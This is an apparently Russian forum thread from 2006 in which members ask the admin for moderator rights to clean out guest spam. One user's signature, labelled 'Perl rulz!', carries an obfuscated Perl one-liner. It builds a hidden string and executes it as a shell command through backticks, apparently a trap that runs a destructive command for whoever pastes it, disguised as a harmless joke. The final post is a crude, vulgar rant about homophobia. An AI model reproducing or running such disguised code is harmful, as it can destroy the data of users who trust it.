Добавлено: Чт Мар 02, 2006 11:50 am Заголовок сообщения:
а нахера от нее ваще откашивать?
деня, сделай нас с тигром модерами в категориях, которые гостям видны _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Чт Мар 02, 2006 3:32 pm Заголовок сообщения:
основной прок в том чтобы госте-мудаков-спамеров удалять и форум не превращался в соадфан.сру
а поскольку мое мнение никого не колышет, то темы я не начинаю никогда из принципа, ибо ответов как правило 0(ноль) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Чт Мар 02, 2006 4:20 pm Заголовок сообщения:
а ты думаешь, что я не удаляю? или что они ночью ниче не постят? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Чт Мар 02, 2006 8:50 pm Заголовок сообщения:
Я тоже постоянно чищу. Нефиг!
Рельно втроем проще чистить же.
У меня предложение - сделай нас ВЕЗДЕ вдвоем модерами. Я как бы с рабоы часто заглядываю и леха тоже пока меня нет, а ты пока нас нет... Ну ты понял.
Все равно мы никого не обижаем. Это реально...
Могу предложить открыть все темы, но гостям запретить создавать темы. _________________ iddqd
Добавлено: Чт Мар 02, 2006 9:50 pm Заголовок сообщения:
не, деня, доступ открывать не надо, но сделай хоть модерами, хотя я давно просил дать мне админа чтобы мог нормально айпи-областя забанить им, или давай сам, тыж можешь, давно пора, бляйн
а если сурьезно, тигра, давай устроим забастовку и не будем ниче чистить, ато ему нравится как мы его просим
Добавлено: Сб Мар 04, 2006 12:38 am Заголовок сообщения:
Всмысле вот.
Хотят тут выебать,ты мол говоришь не надо,те говорят ты гомофоб,потом опять типа наклонись и опять гомо,ну говоришь нет,я не из таких,и опять в твой адрес гомофоб.Потом я не голубой и не хочу им быть,и опять ты гомофоб,это получается те кто не из таких ,те все гомофобы!?!?!?!?!?
Запутолся я